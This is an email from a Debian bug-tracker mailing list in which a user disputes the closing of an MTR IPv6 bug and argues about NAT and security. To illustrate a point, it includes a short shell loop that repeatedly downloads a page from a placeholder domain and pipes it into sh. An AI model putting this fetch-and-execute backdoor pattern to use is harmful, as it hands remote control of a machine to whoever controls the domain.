On Mon, Apr 28, 2014 at 12:02:50PM +0200, Jeroen Massar wrote:
> > You're saying that masquerading makes my machine wide open?
> 
> Bingo. It is no more "secure" than putting it directly on the network.
> See amongst others http://samy.pl/pwnat/

If I run software on a server inside the NAT it can give away "access"
to resources behind the NAT.

  #!/bin/sh
  while true ; do
    lynx -dump http://www.somedomain.com/lkjasdfkj | sh 
    sleep 60
  done

This gives access to my machine to anyone who can register
"somedomain.com" and install something on the link.

The referenced program and technical paper state that for peer-to-peer
networks this is important. IF peers A and B are on the internet and X
and Y are NATed, then A communicating to B means just set up the
connection. If X wants to communicate with A that's simple as
well. The NAT router will setup the connection once X initiates the
connection. Similarly if B wants to communicate to X, B just has to
trigger (using the protocol somehow) that X starts an outgoing
connection to B. But X communicating with Y becomes problematic. They
have solved this by having the peer-to-peer program silently open up a
connection back into the NATed area.

> Your problem, as you are causing problems for yourself.
> 
> That is what this ticket is about: you caused a problem, as the tool
> expects there to be IPv6 support, even if it won't use it.

There is a bug in MTR that it will try to open IPV6 sockets for name
server communication even when explcitly told to do IPV4 only.

I disagree with closing the bug as "user-error". 

        Roger. 

-- 
+-- Rogier Wolff -- www.harddisk-recovery.nl -- 0800 220 20 20 --
- Datarecovery Services Nederland B.V. Delft. KVK: 30160549 -
| Files foetsie, bestanden kwijt, alle data weg?!
| Blijf kalm en neem contact op met Harddisk-recovery.nl!


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Reply via email to